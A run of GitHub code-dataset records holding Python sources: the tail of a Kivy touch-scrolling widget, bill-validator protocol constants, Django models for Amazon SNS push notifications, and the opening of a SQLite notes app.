Animation.stop_all(self, 'scroll_x', 'scroll_y')\r\n Animation(scroll_x=sxp, scroll_y=syp, **animate).start(self)\r\n else:\r\n self.scroll_x = sxp\r\n self.scroll_y = syp\r\n\r\n def scroll_to(self, per_x, per_y, animate=True):\r\n sxp = min(1, max(0, per_x))\r\n syp = min(1, max(0, per_y))\r\n Animation.stop_all(self, 'scroll_x', 'scroll_y')\r\n if animate:\r\n if animate is True:\r\n animate = {'d': 0.2, 't': 'out_quad'}\r\n Animation(scroll_x=sxp, scroll_y=syp, **animate).start(self)\r\n else:\r\n self.scroll_x = sxp\r\n self.scroll_y = syp\r\n\r\n def scroll_by(self, per_x, per_y, animate=True):\r\n self.scroll_to(self.scroll_x + per_x, self.scroll_y + per_y, animate=animate)\r\n\r\n def convert_distance_to_scroll(self, dx, dy):\r\n '''Convert a distance in pixels to a scroll distance, depending on the\r\n content size and the scrollview size.\r\n The result will be a tuple of scroll distance that can be added to\r\n :data:`scroll_x` and :data:`scroll_y`\r\n '''\r\n if not self._viewport:\r\n return 0, 0\r\n vp = self._viewport\r\n if vp.width > self.width:\r\n sw = vp.width - self.width\r\n sx = dx / float(sw)\r\n else:\r\n sx = 0\r\n if vp.height > self.height:\r\n sh = vp.height - self.height\r\n sy = dy / float(sh)\r\n else:\r\n sy = 1\r\n return sx, sy\r\n\r\n def update_from_scroll(self, *largs):\r\n '''Force the reposition of the content, according to current value of\r\n :attr:`scroll_x` and :attr:`scroll_y`.\r\n This method is automatically called when one of the :attr:`scroll_x`,\r\n :attr:`scroll_y`, :attr:`pos` or :attr:`size` properties change, or\r\n if the size of the content changes.\r\n '''\r\n if not self._viewport:\r\n self.g_translate.xy = self.pos\r\n return\r\n vp = self._viewport\r\n\r\n # update from size_hint\r\n if vp.size_hint_x is not None:\r\n w = vp.size_hint_x * self.width\r\n if vp.size_hint_min_x is not None:\r\n w = max(w, vp.size_hint_min_x)\r\n if vp.size_hint_max_x is not None:\r\n w = min(w, vp.size_hint_max_x)\r\n vp.width = w\r\n\r\n if vp.size_hint_y is not None:\r\n h = vp.size_hint_y * self.height\r\n if vp.size_hint_min_y is not None:\r\n h = max(h, vp.size_hint_min_y)\r\n if vp.size_hint_max_y is not None:\r\n h = min(h, vp.size_hint_max_y)\r\n vp.height = h\r\n\r\n if vp.width > self.width:\r\n sw = vp.width - self.width\r\n x = self.x - self.scroll_x * sw\r\n else:\r\n x = self.x\r\n\r\n if vp.height > self.height:\r\n sh = vp.height - self.height\r\n y 
= self.y - self.scroll_y * sh\r\n else:\r\n y = self.top - vp.height\r\n\r\n # from 1.8.0, we now use a matrix by default, instead of moving the\r\n # widget position behind. We set it here, but it will be a no-op most\r\n # of the time.\r\n vp.pos = 0, 0\r\n self.g_translate.xy = x, y\r\n\r\n def add_widget(self, widget, *args, **kwargs):\r\n if self._viewport:\r\n raise Exception('ScrollView accept only one widget')\r\n canvas = self.canvas\r\n self.canvas = self.canvas_viewport\r\n super().add_widget(widget, *args, **kwargs)\r\n self.canvas = canvas\r\n self._viewport = widget\r\n widget.bind(size=self._trigger_update_from_scroll, size_hint_min=self._trigger_update_from_scroll)\r\n self._trigger_update_from_scroll()\r\n\r\n def remove_widget(self, widget, *args, **kwargs):\r\n canvas = self.canvas\r\n self.canvas = self.canvas_viewport\r\n super().remove_widget(widget, *args, **kwargs)\r\n self.canvas = canvas\r\n if widget is self._viewport:\r\n self._viewport = None\r\n\r\n\r\nclass TouchScroller(BasicScroller):\r\n \"\"\"\r\n Modified version of Kivy's ScrollView widget, allows for finer control over touch events.\r\n allow_middle_mouse: set this to True to enable scrolling with the middle mouse button (blocks middle mouse clicks on child widgets).\r\n allow_flick: set this to True to enable touch 'flicks' to scroll the view.\r\n allow_drag: Set this to True to enable click-n-drag scrolling within the scrollview itself.\r\n allow_wheel: set this to True to enable scrolling via the mouse wheel.\r\n exclude_widgets: ListProperty, add any child widgets to this, and they will receive all touches on them, blocking any touch controlls of this widget within their bounds.\r\n \"\"\"\r\n\r\n scroll_distance = NumericProperty(_scroll_distance)\r\n scroll_timeout = NumericProperty(_scroll_timeout)\r\n scroll_wheel_distance = NumericProperty('20sp')\r\n\r\n allow_middle_mouse = BooleanProperty(True)\r\n allow_flick = BooleanProperty(True)\r\n allow_drag = BooleanProperty(True)\r\n allow_wheel = BooleanProperty(True)\r\n exclude_widgets = ListProperty()\r\n\r\n _touch_moves = 0\r\n _touch_delay = None\r\n _start_scroll_x = 0\r\n _start_scroll_y = 0\r\n\r\n def do_touch_down(self, touch):\r\n if self.collide_point(*touch.pos):\r\n for widget in self.exclude_widgets:\r\n touch.push()\r\n #touch.apply_transform_2d(self.to_local)\r\n touch.apply_transform_2d(self.to_widget)\r\n if widget.collide_point(*touch.pos):\r\n return super().on_touch_down(touch)\r\n touch.pop()\r\n\r\n #delay touch to check if scroll is initiated\r\n if 'button' in touch.profile and touch.button.startswith('scroll'):\r\n if self.allow_wheel:\r\n touch.grab(self)\r\n btn = touch.button\r\n return self.wheel_scroll(btn)\r\n else:\r\n return self.transformed_touch(touch)\r\n\r\n touch.grab(self)\r\n self._touch_delay = None\r\n self._touch_moves = 0\r\n\r\n self._start_scroll_x = self.scroll_x\r\n self._start_scroll_y = self.scroll_y\r\n if self.allow_middle_mouse and 'button' in touch.profile and touch.button == 'middle':\r\n return True\r\n if self.allow_drag or self.allow_flick:\r\n self._touch_delay = Clock.schedule_once(partial(self._on_touch_down_delay, touch), (self.scroll_timeout / 1000))\r\n else:\r\n return self.transformed_touch(touch)\r\n return True\r\n\r\n def do_touch_up(self, touch):\r\n if touch.grab_current == self:\r\n touch.ungrab(self)\r\n if self.allow_middle_mouse and 'button' in touch.profile and touch.button == 'middle':\r\n return True\r\n if self._touch_delay:\r\n self._touch_delay.cancel()\r\n 
self._touch_delay = None\r\n dx, dy = self.touch_moved_distance(touch)\r\n if self.allow_flick and (dx or dy):\r\n per_x = self.scroll_x - ((dx * 2) / self.width)\r\n per_y = self.scroll_y - ((dy * 2) / self.height)\r\n self.scroll_to(per_x, per_y)\r\n self._touch_delay = None\r\n return True\r\n else:\r\n self.transformed_touch(touch)\r\n return self.transformed_touch(touch, 'up')\r\n\r\n def _on_touch_down_delay(self, touch, *largs):\r\n self._touch_delay = None\r\n dx, dy = self.touch_moved_distance(touch)\r\n if self.allow_drag and (dx or dy):\r\n #user has satisfied the requirements for scrolling\r\n return True\r\n else:\r\n touch.ungrab(self)\r\n #Need to fix the touch position since it has been translated by this widget's position somehow...\r\n touch.push()\r\n touch.apply_transform_2d(self.to_widget)\r\n touch.apply_transform_2d(self.to_parent)\r\n return self.transformed_touch(touch)\r\n\r\n def do_touch_move(self, touch):\r\n middle_button = 'button' in touch.profile and touch.button == 'middle'\r\n if not self.allow_drag and not middle_button:\r\n return\r\n if self._touch_delay:\r\n always = False\r\n else:\r\n always = True\r\n if touch.grab_current == self:\r\n self._touch_moves += 1\r\n if self._touch_moves == 1 and not middle_button:\r\n animate = True\r\n else:\r\n animate = False\r\n dx, dy = self.touch_moved_distance(touch, always=always)\r\n if self.viewport_size[0] != self.width:\r\n per_x = self._start_scroll_x + (dx / (self.width - self.viewport_size[0]))\r\n else:\r\n per_x = self._start_scroll_x\r\n if self.viewport_size[1] != self.height:\r\n per_y = self._start_scroll_y + (dy / (self.height - self.viewport_size[1]))\r\n else:\r\n per_y = self._start_scroll_y\r\n self.scroll_to(per_x, per_y, animate=animate)\r\n\r\n def touch_moved_distance(self, touch, always=False):\r\n #determines if the touch has moved the required distance to allow for scrolling\r\n can_move_x = self.viewport_size[0] > self.width\r\n can_move_y = self.viewport_size[1] > self.height\r\n dx = touch.pos[0] - touch.opos[0]\r\n dy = touch.pos[1] - touch.opos[1]\r\n if can_move_x and (always or abs(dx) >= self.scroll_distance):\r\n pass\r\n else:\r\n dx = 0\r\n if can_move_y and (always or abs(dy) >= self.scroll_distance):\r\n pass\r\n else:\r\n dy = 0\r\n \r\n return dx, dy\r\n\r\n def wheel_scroll(self, btn):\r\n can_move_x = self.viewport_size[0] > self.width\r\n can_move_y = self.viewport_size[1] > self.height\r\n scroll_percent_x = self.scroll_wheel_distance / self.viewport_size[0]\r\n scroll_percent_y = self.scroll_wheel_distance / self.viewport_size[1]\r\n\r\n if can_move_x and can_move_y:\r\n if btn == 'scrollup':\r\n self.scroll_by(0, scroll_percent_y, animate=False)\r\n elif btn == 'scrolldown':\r\n self.scroll_by(0, 0 - scroll_percent_y, animate=False)\r\n elif btn == 'scrollleft':\r\n self.scroll_by(scroll_percent_x, 0, animate=False)\r\n elif btn == 'scrollright':\r\n self.scroll_by(0 - scroll_percent_x, 0, animate=False)\r\n elif can_move_x:\r\n if btn in ['scrolldown', 'scrollleft']:\r\n self.scroll_by(scroll_percent_x, 0, animate=False)\r\n elif btn in ['scrollup', 'scrollright']:\r\n self.scroll_by(0 - scroll_percent_x, 0, animate=False)\r\n elif can_move_y:\r\n if btn in ['scrolldown', 'scrollright']:\r\n self.scroll_by(0, scroll_percent_y, animate=False)\r\n elif btn in ['scrollup', 'scrollleft']:\r\n self.scroll_by(0, 0 - scroll_percent_y, animate=False)\r\n return True\r\n","repo_name":"snuq/KivyExamples","sub_path":"Basic 
Scroller/basicscroller.py","file_name":"basicscroller.py","file_ext":"py","file_size_in_byte":24333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13178424299","text":"# -*- coding: utf-8 -*-\n# Autor: Matias Novoa\n# Año: 2014\n# Licencia: GNU/GPL V3 http://www.gnu.org/copyleft/gpl.html\n#\n# states\nNOT_SENT = 0\nSENDING = 1\nSENT = 2\n\n# Command codes\nSYNC = 'FC'\nLNG_5 = '05'\nLNG_6 = '06'\nLNG_7 = '07'\n# Operation command\nRESET = '40'\nSTACK_1 = '41'\nSTACK_2 = '42'\nRETURN = '43'\nHOLD = '44'\nWAIT = '45'\n# ACK\nACK = '50'\n# Setting Command\nENABLE = 'C0'\nSECURITY = 'C1'\nCOMMUNICATION = 'C2'\nINHIBIT = 'C3'\nDIRECTION = 'C4'\nOPTIONAL = 'C5'\n# Setting status request\nREQ_STATUS = '11'\nREQ_ENABLE = '80'\nREQ_SECURITY = '81'\nREQ_COMMUNICATION = '82'\nREQ_INHIBIT = '83'\nREQ_DIRECTION = '84'\nREQ_OPTIONAL = '85'\nREQ_VERSION = '88'\nREQ_BOOT = '89'\nREQ_CURRENCY = '8A'\n\n# denominations to accept\nBVU_ACCEPT_1 = 0x01\nBVU_ACCEPT_5 = 0x04\nBVU_ACCEPT_10 = 0x08\nBVU_ACCEPT_20 = 0x10\nBVU_ACCEPT_50 = 0x20\nBVU_ACCEPT_100 = 0x40\n\n# denominations accepted\nBILL_VALUE = {\n '62': 2,\n '63': 5,\n '64': 10,\n '65': 20,\n '66': 50,\n '67': 100\n }\n\n# generic denomination codes\nBVU_ESCROW_61 = 0x61\nBVU_ESCROW_62 = 0x62\nBVU_ESCROW_63 = 0x63\nBVU_ESCROW_64 = 0x64\nBVU_ESCROW_65 = 0x65\nBVU_ESCROW_66 = 0x66\nBVU_ESCROW_67 = 0x67\nBVU_ESCROW_68 = 0x68\nBVU_ESCROW_69 = 0x69\nBVU_ESCROW_6A = 0x6A\nBVU_ESCROW_6B = 0x6B\nBVU_ESCROW_6C = 0x6C\nBVU_ESCROW_6D = 0x6D\nBVU_ESCROW_6E = 0x6E\nBVU_ESCROW_6F = 0x6F\n\n# accepted directions\nBVU_DIRECTION_A = '01'\nBVU_DIRECTION_B = '02'\nBVU_DIRECTION_C = '03'\nBVU_DIRECTION_D = '04'\n\n# failure codes ID003\nFAILURE_DATA = {\n 'a2': 'Stack motor failure',\n 'a5': 'Transport(feed) motor speed failure',\n 'a6': 'Transport(feed) motor failure',\n 'a8': 'Selenoid failure',\n 'a9': 'PB unit failure',\n 'ab': 'Cash box not ready',\n 'af': 'Validator head remove',\n 'b0': 'BOOT ROM failure',\n 'b1': 'External ROM failure',\n 'b2': 'RAM failure',\n 'b3': 'External ROM writing failure'\n }\n\n# failure codes ICB\nBVU_FAILURE_ICB_02 = 0x02\nBVU_FAILURE_ICB_03 = 0x03\nBVU_FAILURE_ICB_04 = 0x04\nBVU_FAILURE_ICB_07 = 0x07\nBVU_FAILURE_ICB_08 = 0x08\nBVU_FAILURE_ICB_09 = 0x09\n\n# Status Results\nSTATUS_RESULT = {\n '11': 'IDLING',\n '12': 'ACCEPTING',\n '13': 'ESCROW',\n '14': 'STACKING',\n '15': 'VEND_VALID',\n '16': 'STACKED',\n '17': 'REJECTING',\n '18': 'RETURNING',\n '19': 'HOLDING',\n '1a': 'DISABLED',\n '1b': 'INITIALIZING',\n '40': 'POWER UP',\n '41': 'POWER UP BILL IN ACCEPTOR',\n '42': 'POWER UP BILL IN STACKER',\n '43': 'STACKER FULL',\n '44': 'STACKER OPEN',\n '45': 'JAM IN ACCEPTOR',\n '46': 'JAM IN STACKER',\n '47': 'PAUSE',\n '48': 'CHEATED',\n '49': 'FAILURE',\n '4a': 'COMMUNICATION ERROR',\n '50': 'ACK'\n }\n\n# REJECTING DATA\n\nREJECT_DATA = {\n '71': 'Insertion error',\n '72': 'Mug error',\n '73': 'Return action due to residual bills',\n '74': 'Calibration / magnification error',\n '75': 'Conveying error',\n '76': 'Discrimination error for bill denomination',\n '77': 'Photo pattern error',\n '78': 'Photo level error',\n '79': 'Return by INHIBIT: error of insertion direction',\n '7a': 'None',\n '7b': 'Operation error',\n '7c': 'Return action due to residual bills',\n '7d': 'Lenght error',\n '7e': 'Photo pattern error',\n '7f': 'True bill feature error'\n }\n# COMMUNICATION ERRORS\nDCB_ERROR = 0x01\nPORT_ALREADY_OPENED = 0x02\nPORT_SETTINGS_FAILED = 0x03\nINVALID_PORT = 
0x04\nERROR_CE_BREAK = 0x05\nERROR_CE_FRAME = 0x06\nERROR_CE_IOE = 0x07\nERROR_CE_MODE = 0x08\nERROR_CE_OVERRUN = 0x09\nERROR_CE_RXOVER = 0x0A\nERROR_CE_RXPARITY = 0x0B\nERROR_CE_TXFULL = 0x0C\nRXTIME_OUT = 0x0D\nCRC_ERROR = 0x0E\n","repo_name":"mattgaviota/stone","sub_path":"lib/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"70163118250","text":"import logging\nfrom abc import abstractmethod, abstractproperty\nimport json\nfrom boto.exception import BotoServerError\nimport re\nfrom django.db import models\nfrom scarface.platform_strategy import get_strategies\nfrom scarface.utils import DefaultConnection, PushLogger\nfrom scarface.exceptions import SNSNotCreatedException, PlatformNotSupported, \\\n    SNSException, NotRegisteredException\n\n\nlogger = logging.getLogger('django_scarface')\n\n\nclass SNSCRUDMixin(object):\n\n    @abstractproperty\n    def resource_name(self):\n        pass\n\n    @property\n    def response_key(self):\n        '''\n        Used for extracting the response key from a create response.\n        '''\n        return u'Create{0}Response'.format(self.resource_name)\n\n    @property\n    def result_key(self):\n        '''\n        Used for extracting the result key from a create response.\n        '''\n        return u'Create{0}Result'.format(self.resource_name)\n\n    @property\n    def arn_key(self):\n        '''\n        Used for extracting the arn key from a response.\n        '''\n        return u'{0}Arn'.format(self.resource_name)\n\n    @property\n    def is_registered(self):\n        '''\n        Returns whether the instance is registered\n        to SNS or not\n        '''\n        return self.arn and len(self.arn) > 0\n\n    def is_registered_or_register(self):\n        if not self.is_registered:\n            return self.register()\n        return True\n\n    def set_arn_from_response(self, response_dict):\n        \"\"\"\n        Extracts the arn key from a boto response dict.\n        :type response_dict: dict\n        :param response_dict:\n        :rtype boolean:\n        :return :\n        \"\"\"\n        success = False\n        try:\n            self.arn = response_dict[self.response_key][self.result_key][\n                self.arn_key]\n            success = True\n        except KeyError:\n            pass\n        return success\n\n    @abstractmethod\n    def register(self, connection=None):\n        \"\"\"\n        Registers the instance to SNS.\n        :param connection:\n        :rtype boolean:\n        :return: if create was successful\n        \"\"\"\n        pass\n\n\nclass Application(models.Model):\n    '''\n    Main access point for the scarface library. Used\n    to manage the different platforms.\n    '''\n    name = models.CharField(\n        max_length=255,\n        unique=True\n    )\n\n    def __str__(self):\n        return self.name\n\n    def get_device(self, device_id):\n        '''\n        Returns a device by its device_id.\n        '''\n        return self.devices.get(udid=device_id)\n\n    def get_topic(self, name):\n        '''\n        Returns a topic by its name.\n        '''\n        return self.topics.get(name=name)\n\n    def get_or_create_topic(self, name):\n        '''\n        Returns a topic by its name. 
If the topic is\n        not yet registered with this application, the\n        topic is created.\n        :return: Topic, created\n        :exception SNSException\n        '''\n        try:\n            return self.topics.get(name=name), False\n        except Topic.DoesNotExist:\n            topic = Topic.objects.create(\n                application=self,\n                name=name\n            )\n            topic.register()\n            topic.save()\n            return topic, True\n\n    def get_platform(self, platform_type):\n\n        try:\n            return self.platforms.get(platform=platform_type)\n        except Platform.DoesNotExist:\n            raise PlatformNotSupported\n\n\nclass Device(SNSCRUDMixin, models.Model):\n    '''\n    Device class for registering an endpoint to\n    SNS.\n    '''\n\n    device_id = models.CharField(\n        max_length=255,\n    )\n\n    platform = models.ForeignKey(\n        to='Platform',\n        on_delete=models.CASCADE,\n        related_name='devices'\n    )\n\n    arn = models.CharField(\n        max_length=255,\n        null=True,\n        blank=True\n    )\n\n    push_token = models.CharField(\n        max_length=512,\n    )\n\n    topics = models.ManyToManyField(\n        to='Topic',\n        through='Subscription'\n    )\n\n    class Meta:\n        unique_together = (('device_id', 'platform'))\n\n    @property\n    def resource_name(self):\n        return 'PlatformEndpoint'\n\n    @property\n    def arn_key(self):\n        return \"EndpointArn\"\n\n    @DefaultConnection\n    def register(self, custom_user_data='', connection=None):\n        '''\n        :exception SNSException\n        '''\n        self.platform.is_registered_or_register()\n        response = connection.create_platform_endpoint(\n            self.platform.arn,\n            self.push_token,\n            custom_user_data=custom_user_data\n        )\n        success = self.set_arn_from_response(response)\n        if not success:\n            raise SNSException(\n                'Failed to register Device.({0})'.format(success)\n            )\n        self.save()\n        return success\n\n    @DefaultConnection\n    def register_or_update(self, new_token=None, custom_user_data=u\"\",\n                           connection=None):\n        '''\n        Registers the device to SNS. 
\n @DefaultConnection\n def register_or_update(self, new_token=None, custom_user_data=u\"\",\n connection=None):\n '''\n Registers the device to SNS. If the device was\n previously registered the registration is updated.\n :return: True if the registration/update was successful\n '''\n if self.is_registered:\n result = self.update(new_token, custom_user_data, connection)\n else:\n try:\n result = self.register(custom_user_data, connection)\n # Heavily inspired by http://stackoverflow.com/a/28316993/270265\n except BotoServerError as err:\n result_re = re.compile(r'Endpoint(.*)already', re.IGNORECASE)\n result = result_re.search(err.message)\n if result:\n arn = result.group(0).replace('Endpoint ', '').replace(\n ' already', '')\n self.arn = arn\n self.update(new_token, custom_user_data, connection)\n else:\n sns_exc = SNSNotCreatedException(err)\n sns_exc.message = err.message\n raise sns_exc\n\n return result\n\n @DefaultConnection\n def deregister(self, connection=None, save=True):\n \"\"\"\n Deregisters the device from SNS.\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :param save: whether the device should be saved, after the device has\n been deregistered.\n :return:\n \"\"\"\n if not self.is_registered:\n raise NotRegisteredException()\n success = connection.delete_endpoint(self.arn)\n if not success:\n raise SNSException(\n 'Failed to deregister device.({0})'.format(success)\n )\n self.arn = None\n if save: self.save()\n return success\n\n @DefaultConnection\n def send_message(self, message, connection=None):\n if not self.is_registered:\n raise NotRegisteredException\n return connection.publish(message=message, target_arn=self.arn)\n\n @PushLogger\n @DefaultConnection\n def send(self, push_message, connection=None):\n \"\"\"\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :return:\n \"\"\"\n if not self.is_registered:\n raise NotRegisteredException\n push_message = self.platform.format_payload(push_message)\n json_string = json.dumps(push_message)\n return connection.publish(\n message=json_string,\n target_arn=self.arn,\n message_structure=\"json\"\n )\n\n @DefaultConnection\n def update(self, new_token=None, custom_user_data=u\"\", connection=None):\n \"\"\"\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :return:\n \"\"\"\n if not self.is_registered:\n raise NotRegisteredException\n\n new_token = new_token if new_token else self.push_token\n attributes = {\"Enabled\": True, \"Token\": new_token}\n if custom_user_data:\n attributes[\"CustomUserData\"] = custom_user_data\n answer = connection.set_endpoint_attributes(self.arn, attributes)\n self.is_enabled = True\n self.push_token = new_token\n return answer\n\n def sign(self, push_message):\n push_message.receiver_arn = self.arn\n push_message.message_type = PushMessage.MESSAGE_TYPE_TOPIC\n
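\n# Illustrative result of Platform.format_payload(msg) for an APNS platform\n# (the exact keys come from the strategy configured in scarface.platform_strategy):\n# {'APNS': '{\"aps\": {\"alert\": \"Hi\", \"badge\": 1}}'}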
\n\nclass Platform(SNSCRUDMixin, models.Model):\n platform = models.CharField(\n max_length=255,\n )\n\n arn = models.CharField(\n max_length=255,\n null=True,\n blank=True\n )\n\n application = models.ForeignKey(\n to=Application,\n on_delete=models.CASCADE,\n related_name='platforms'\n )\n\n credential = models.CharField(\n max_length=255,\n blank=True,\n null=True\n )\n\n principal = models.CharField(\n max_length=255,\n blank=True,\n null=True\n )\n\n def __str__(self):\n return \"{0} ({1})\".format(self.platform, self.application)\n\n class Meta:\n unique_together = ('application', 'platform')\n\n @property\n def app_name(self):\n return self.application.name\n\n @property\n def strategy(self):\n strategies = get_strategies()\n if self.platform in strategies.keys():\n return strategies[self.platform](self)\n else:\n raise PlatformNotSupported\n\n @property\n def name(self):\n return u\"_\".join([self.app_name, self.platform]).lower()\n\n @property\n def resource_name(self):\n return 'PlatformApplication'\n\n @property\n def attributes(self):\n return {\n \"PlatformCredential\": self.credential,\n \"PlatformPrincipal\": self.principal\n }\n\n @DefaultConnection\n def register(self, connection=None):\n \"\"\"\n Adds an app to SNS. Apps are per platform. The name of a\n sns application is app_platform.\n\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :rtype bool:\n :return:\n \"\"\"\n\n response = connection.create_platform_application(\n self.name,\n self.platform,\n self.attributes\n )\n if not response:\n raise SNSException(\n 'Failed to register Platform.{0}'.format(response)\n )\n return self.set_arn_from_response(response)\n\n @DefaultConnection\n def deregister(self, connection=None, save=True):\n \"\"\"\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :return:\n \"\"\"\n if not self.is_registered:\n raise NotRegisteredException\n\n success = connection.delete_platform_application(self.arn)\n if not success:\n raise SNSException(\n 'Failed to deregister Platform.({0})'.format(success)\n )\n self.arn = None\n if save: self.save()\n return success\n\n @DefaultConnection\n def all_devices(self, connection=None):\n \"\"\"\n Returns all devices which are registered with this\n platform.\n\n :param connection:\n :return: List of Devices associated with this platform\n \"\"\"\n endpoint_arns = list()\n\n def get_next(nexttoken):\n response = connection.list_endpoints_by_platform_application(\n platform_application_arn=self.arn,\n next_token=nexttoken)\n result = response[u'ListEndpointsByPlatformApplicationResponse'][\n u'ListEndpointsByPlatformApplicationResult']\n endpoints = result[u'Endpoints']\n for endpoint in endpoints:\n endpoint_arns.append(\n endpoint['EndpointArn']\n )\n\n return result[u'NextToken']\n\n next_token = get_next(None)\n\n while next_token:\n next_token = get_next(next_token)\n\n devices_list = list(Device.objects.filter(arn__in=endpoint_arns))\n\n return devices_list\n\n def format_payload(self, data):\n return self.strategy.format_payload(data)\n\n\nclass Topic(SNSCRUDMixin, models.Model):\n name = models.CharField(\n max_length=64\n )\n application = models.ForeignKey(\n to=Application,\n on_delete=models.CASCADE,\n related_name='topics'\n )\n arn = models.CharField(\n max_length=255,\n null=True,\n blank=True\n )\n devices = models.ManyToManyField(\n to=Device,\n through='Subscription'\n )\n\n class Meta:\n unique_together = (('name', 'application'))\n\n @property\n def resource_name(self):\n return 'Topic'\n\n @property\n def full_name(self):\n return '_'.join([self.application.name, self.name])\n\n @DefaultConnection\n def register(self, connection=None):\n\n response = connection.create_topic(self.full_name)\n if not response:\n raise SNSException(\n 'Failed to register Topic. 
({0})'.format(response)\n )\n self.set_arn_from_response(response)\n self.save()\n\n @DefaultConnection\n def deregister(self, connection=None, save=True):\n if not self.is_registered:\n raise NotRegisteredException\n success = connection.delete_topic(self.arn)\n if not success:\n raise SNSException(\n 'Failed to deregister Topic. ({0})'.format(success)\n )\n\n self.arn = None\n if save: self.save()\n\n return success\n\n @DefaultConnection\n def register_device(self, device, connection=None):\n \"\"\"\n :type device: Device\n :param device:\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :rtype bool:\n :return:\n \"\"\"\n self.is_registered_or_register()\n device.is_registered_or_register()\n subscription, created = Subscription.objects.get_or_create(\n device=device,\n topic=self,\n )\n success = subscription.register(connection)\n return success\n\n @DefaultConnection\n def deregister_device(self, device, connection=None):\n if not device.is_registered:\n raise NotRegisteredException\n try:\n subscription = Subscription.objects.get(\n device=device,\n topic=self\n )\n subscription.deregister(connection)\n subscription.delete()\n except Subscription.DoesNotExist:\n logger.warning(\"Device is not registered with topic.\")\n return False\n return True\n\n @DefaultConnection\n def all_subscriptions(self, connection=None):\n subscriptions_list = list()\n\n def get_next(nexttoken):\n response = connection.get_all_subscriptions_by_topic(\n topic=self.arn, next_token=nexttoken)\n result = response[\"ListSubscriptionsByTopicResponse\"][\n \"ListSubscriptionsByTopicResult\"]\n subs = result[u'Subscriptions']\n subscriptions_list.extend(subs)\n return result[u'NextToken']\n\n next_token = get_next(None)\n\n while next_token:\n next_token = get_next(next_token)\n\n return subscriptions_list\n\n def sign(self, push_message):\n push_message.receiver_arn = self.arn\n push_message.message_type = PushMessage.MESSAGE_TYPE_TOPIC\n\n @PushLogger\n @DefaultConnection\n def send(self, push_message, connection=None):\n \"\"\"\n\n :type push_message: PushMessage\n :param push_message:\n :return:\n \"\"\"\n payload = dict()\n for platform in self.application.platforms.all():\n payload.update(platform.format_payload(push_message))\n payload[\"default\"] = push_message.message\n json_string = json.dumps(payload)\n return connection.publish(\n message=json_string,\n topic=self.arn,\n message_structure=\"json\"\n )\n\n\nclass PushMessage(models.Model):\n MESSAGE_TYPE_DEFAULT = 0\n MESSAGE_TYPE_TOPIC = 1\n sound = models.TextField(blank=True, null=True)\n message = models.TextField(default='', null=True)\n has_new_content = models.BooleanField(default=False)\n context_id = models.TextField(default='none', null=True)\n context = models.TextField(default='default', null=True)\n badge_count = models.SmallIntegerField(default=0)\n extra_payload = models.TextField(blank=True, null=True)\n receiver_arn = models.TextField(blank=True, null=True)\n message_type = models.PositiveSmallIntegerField(default=0)\n\n def as_dict(self):\n d = {\n 'message': self.message,\n 'context': self.context,\n 'context_id': self.context_id,\n 'badge_count': self.badge_count,\n 'sound': self.sound,\n 'has_new_content': self.has_new_content\n }\n if self.extra_payload:\n d.update(self.extra_payload)\n return d\n
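\n\n# The multi-platform message published by Topic.send looks like (illustrative):\n# {\"default\": \"Hello\", \"APNS\": \"{...}\", \"GCM\": \"{...}\"}\n# With message_structure=\"json\", SNS delivers the per-platform entry and falls\n# back to \"default\" for protocols without one.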
\n\nclass Subscription(SNSCRUDMixin, models.Model):\n topic = models.ForeignKey(\n to=Topic,\n on_delete=models.CASCADE\n )\n\n device = models.ForeignKey(\n to=Device,\n on_delete=models.CASCADE\n )\n\n arn = models.CharField(\n max_length=255,\n null=True,\n blank=True\n )\n\n class Meta:\n unique_together = (('topic', 'device'))\n\n @property\n def response_key(self):\n return u'SubscribeResponse'\n\n @property\n def result_key(self):\n return u'SubscribeResult'\n\n @property\n def arn_key(self):\n return u'SubscriptionArn'\n\n @DefaultConnection\n def register(self, connection=None):\n self.device.is_registered_or_register()\n self.topic.is_registered_or_register()\n success = connection.subscribe(\n topic=self.topic.arn,\n endpoint=self.device.arn,\n protocol=\"application\"\n )\n if not success:\n raise SNSException(\n 'Failed to subscribe device to topic.({0})'.format(success)\n )\n self.set_arn_from_response(success)\n self.save()\n\n @DefaultConnection\n def deregister(self, connection=None, save=True):\n if not self.is_registered:\n raise NotRegisteredException\n success = connection.unsubscribe(self.arn)\n if not success:\n raise SNSException(\n 'Failed to unsubscribe Device from Topic.({0})'.format(success)\n )\n self.arn = None\n if save: self.save()\n return success\n","repo_name":"dreipol/django-scarface","sub_path":"scarface/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19163,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"23176465722","text":"from datetime import datetime\nfrom tkinter import messagebox\nimport sqlite3 as sql\nimport json\nimport os\n\n\ndef initialize_database() -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n # Create Categories Table\n sql_query = \"CREATE Table IF NOT EXISTS Categories (\" \\\n \"category_id integer PRIMARY KEY AUTOINCREMENT NOT NULL,\" \\\n \"category_name text NOT NULL\" \\\n \")\"\n script.execute(sql_query)\n\n # Seed the default category (OR IGNORE keeps re-runs from raising on the fixed primary key)\n sql_query = \"INSERT OR IGNORE INTO Categories (category_id, category_name) \" \\\n \"VALUES (0, \\\"None\\\")\"\n script.execute(sql_query)\n\n # Create Notes Table\n sql_query = \"CREATE Table IF NOT EXISTS Notes (\" \\\n \"note_id integer PRIMARY KEY AUTOINCREMENT NOT NULL,\" \\\n \"note_category integer,\" \\\n \"note_title text NOT NULL,\" \\\n \"note_text text,\" \\\n \"creation_date text NOT NULL,\" \\\n \"FOREIGN KEY (note_category) REFERENCES Categories(category_id)\" \\\n \")\"\n script.execute(sql_query)\n\n db.commit()\n script.close()\n db.close()\n\n\ndef get_all_notes() -> list:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n sql_query = \"select * from Notes\"\n\n script.execute(sql_query)\n requests 